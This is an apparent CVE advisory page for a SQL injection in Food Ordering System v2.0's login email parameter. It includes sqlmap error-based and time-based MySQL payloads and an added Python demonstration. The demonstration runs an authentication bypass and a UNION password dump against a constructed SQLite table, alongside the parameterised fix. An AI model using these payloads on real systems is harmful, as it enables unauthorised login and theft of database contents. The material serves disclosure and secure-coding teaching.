CVE-2023-24647: CVE-nu11secur1ty/vendors/oretnom23/2023/Food-Ordering-System-v2.0/SQLi at main · nu11secur1ty/CVE-nu11secur1ty

Food Ordering System v2.0 was discovered to contain a SQL injection vulnerability via the email parameter.

Source: CVE
Tags: #sql #vulnerability #sap

The email parameter of the login form (sent by POST together with password) is vulnerable to SQL injection. A single quote submitted in the email parameter caused a database error message to be returned; two single quotes, which form a valid escaped quote inside a string literal, made the error disappear. This is the classic indication that the value is concatenated unescaped into a quoted SQL string. An attacker able to submit the login form can therefore read arbitrary data from the application's database, as the error-based and time-based blind injections confirmed by sqlmap below show.

---
Parameter: email (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: [email protected]' AND (SELECT 5169 FROM(SELECT COUNT(*),CONCAT(0x716b627171,(SELECT (ELT(5169=5169,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# bwyS&password=r4Q!t5u!L4

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]' AND (SELECT 1469 FROM (SELECT(SLEEP(3)))aKuf)# bETJ&password=r4Q!t5u!L4
---
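The quote probe described above, and the authentication bypass and data extraction that follow from it, reproduced against a constructed in-memory SQLite database. This is an added example, not code from the Food Ordering System or from the nu11secur1ty repository. The table and column names (users, email, password) and the sample rows are assumptions. sqlmap's FLOOR(RAND(0)*2) error-based and SLEEP() time-based payloads are MySQL-specific and are not reproduced here; the SQLite comment terminator `-- ` plays the role that `#` plays in the MySQL payloads above. The parameterised login beside the vulnerable one shows why the probe stops working once the input no longer reaches the SQL parser as syntax.

```python
"""Added example: single-quote probe, bypass and extraction against a
constructed SQLite stand-in for a login query, plus the parameterised fix.
Schema and sample data are assumptions, not the real application's."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the application's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (email, password) VALUES (?, ?)",
        [("alice@example.com", "s3cret"), ("bob@example.com", "hunter2")],
    )
    return conn


def login_vulnerable(conn, email, password):
    """String-concatenated query: the pattern that makes `email` injectable."""
    sql = (
        f"SELECT id FROM users WHERE email = '{email}' "
        f"AND password = '{password}'"
    )
    return conn.execute(sql).fetchall()


def login_fixed(conn, email, password):
    """Parameterised query: the input is bound as data, never parsed as SQL."""
    sql = "SELECT id FROM users WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, password)).fetchall()


def probe(login, conn):
    """The advisory's quote probe as a function.

    Returns (error_on_single_quote, error_on_two_quotes). A vulnerable
    endpoint yields (True, False): one quote leaves the statement with an
    unterminated string literal, two quotes form a valid escaped quote and
    the error disappears. A parameterised endpoint yields (False, False).
    """
    outcome = []
    for payload in ("x'", "x''"):
        try:
            login(conn, payload, "irrelevant")
            outcome.append(False)
        except sqlite3.Error:
            outcome.append(True)
    return tuple(outcome)


def bypass_auth(conn):
    """Comment out the password check: the WHERE clause ends after the email
    literal, so alice's row is returned without her password."""
    return login_vulnerable(conn, "alice@example.com' -- ", "wrong")


def dump_passwords(conn):
    """UNION the stored passwords into the result column: the generalisation
    of 'steal all information from the database' for a one-column query."""
    payload = "x' UNION SELECT password FROM users -- "
    return sorted(login_vulnerable(conn, payload, "wrong"))


if __name__ == "__main__":
    print("vulnerable probe:", probe(login_vulnerable, make_db()))
    print("fixed probe:     ", probe(login_fixed, make_db()))
    print("bypass:", bypass_auth(make_db()))
    print("dump:  ", dump_passwords(make_db()))
    print("fixed, same payload:", login_fixed(make_db(), "alice@example.com' -- ", "wrong"))
```

The probe is the cheapest triage step when reviewing a finding like this one: run it against both code paths before and after a fix, and treat any case where a lone quote still produces a database error as unfixed. Note that suppressing error messages only hides the first probe; the time-based blind payload in the sqlmap output above works without any error text, so the parameterised query, not error handling, is the fix.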

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda